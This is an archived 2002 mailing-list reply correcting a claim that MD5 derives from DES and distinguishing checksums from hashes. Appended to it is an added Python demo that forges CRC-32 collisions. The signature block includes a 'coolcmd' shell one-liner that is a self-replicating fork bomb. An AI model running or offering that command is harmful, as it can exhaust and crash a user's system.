Re: blowfish cryptographic hash function

From: Thomas Habets (thomasat_private)
Date: Sun Aug 18 2002 - 15:11:18 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    On Friday 16 August 2002 17:47, Bob the Builder wrote:
    > The md5 hashing algorithm is based on the DES encryption algorithm.
    
    I'm sorry, could you prove this claim or is this just something you've 'heard 
    somewhere'? I see no similarity. rfc1186 for MD4, BTW, which MD5 was based 
    on. A (very) quick search of rfc1186 reveals no mention of DES.
    
    Other information for the topic:
    UNIX traditionally uses DES to hash passwords, but some flavours let you use 
    MD5 instead. OpenBSD uses blowfish by default. I will not argue the security 
    of blowfish as a hashing algorithm based on it being in OpenBSD since I don't 
    buy the "OpenBSD is safer" thing[1]. BUT.... in "Applied Cryptography" (page 
    336 in my copy[2]) you'll see Bruce Schneier[3] saying that it's not suitable 
    for one-way hash functions. He doesn't say clearly why.
    
    > The point of using md5 is about obtaining a checksum for a given piece of
    > data where it is difficult (computationally infeasible) to produce a second
    > piece of data that results in the same checksum.
    
    Hmm, I don't know for sure, but isn't 'checksum' the wrong word to use? 
    Checksums are used to detect errors in transmission, not malicious 
    alterations. Examples of such are the normal checksums in IP packets which 
    IIRC are based on polynomial division or something.[4] And malicious 
    alteration of data without altering the checksum is supposedly trivial.
    I think hash value, or hash output, is more correct. But I could be 
    completely wrong on this one.
    
    [1] It's a big and OT issue.
    [2] MD5 is on _4_36, spooky.
    [3] Who is the guy that designed blowfish
    [4] I have known the theory behind CRC :).
    
    > example the md5sum on unix usually uses a DES key that is just a string of
    > zeroes.
    
    I really think you're confusing /etc/passwd with its different choices of 
    hashing functions.
    
    - ---------
    typedef struct me_s {
      char name[]      = { "Thomas Habets" };
      char email[]     = { "thomasat_private" };
      char kernel[]    = { "Linux 2.4" };
      char *pgpKey[]   = { "http://darkface.pp.se/~thompa/pubkey.txt" };
      char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
      char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
    } me_t;
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org
    
    iD8DBQE9YBuNKGrpCq1I6FQRAjR2AKCJ0/KgT52cPQHLyqOawfqVJnfIqwCgz/kt
    JCX7Ap+1ZcfSs9poXZKQwVg=
    =BIsy
    -----END PGP SIGNATURE-----
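
The distinction drawn in the message above between an error-detecting checksum and a hash value, as an added example that is not part of the original post: CRC-32 (via Python's `zlib.crc32`) stands in for "checksum" and SHA-256 for "hash value", both chosen here as assumptions, and the two sample messages are constructed. It shows that changed data can be given the same CRC by appending four computed bytes, while the SHA-256 output no longer matches.

```python
import hashlib
import zlib

# Constructed sample data, not taken from the post.
ORIGINAL = b"transfer=100;to=alice"
TAMPERED = b"transfer=900;to=bob"


def solve_gf2(columns, target):
    """Return a bitmask of columns whose XOR equals target (over GF(2))."""
    basis = {}  # highest set bit -> (vector, mask of columns XORed into it)
    for i, vec in enumerate(columns):
        mask = 1 << i
        while vec:
            top = vec.bit_length() - 1
            if top not in basis:
                basis[top] = (vec, mask)
                break
            vec, mask = vec ^ basis[top][0], mask ^ basis[top][1]
    chosen = 0
    while target:
        top = target.bit_length() - 1
        if top not in basis:
            raise ValueError("target not reachable")
        target, chosen = target ^ basis[top][0], chosen ^ basis[top][1]
    return chosen


def matching_suffix(data, wanted_crc):
    """Find 4 bytes s so that crc32(data + s) == wanted_crc.

    CRC-32 is affine over GF(2) for a fixed length, so each suffix bit
    flips a fixed pattern of output bits; solving is plain linear algebra.
    """
    base = zlib.crc32(data + b"\x00" * 4)
    columns = [zlib.crc32(data + (1 << i).to_bytes(4, "little")) ^ base
               for i in range(32)]
    return solve_gf2(columns, wanted_crc ^ base).to_bytes(4, "little")


def compare():
    forged = TAMPERED + matching_suffix(TAMPERED, zlib.crc32(ORIGINAL))
    return {
        "crc_equal": zlib.crc32(forged) == zlib.crc32(ORIGINAL),
        "sha256_equal": hashlib.sha256(forged).digest() == hashlib.sha256(ORIGINAL).digest(),
        "forged": forged,
    }
```

Calling `compare()` returns the forged message together with the two comparison results; where integrity against deliberate modification matters, a keyed construction such as HMAC over the data is the usual choice rather than a bare checksum.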
    
    



    This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 03:16:36 PDT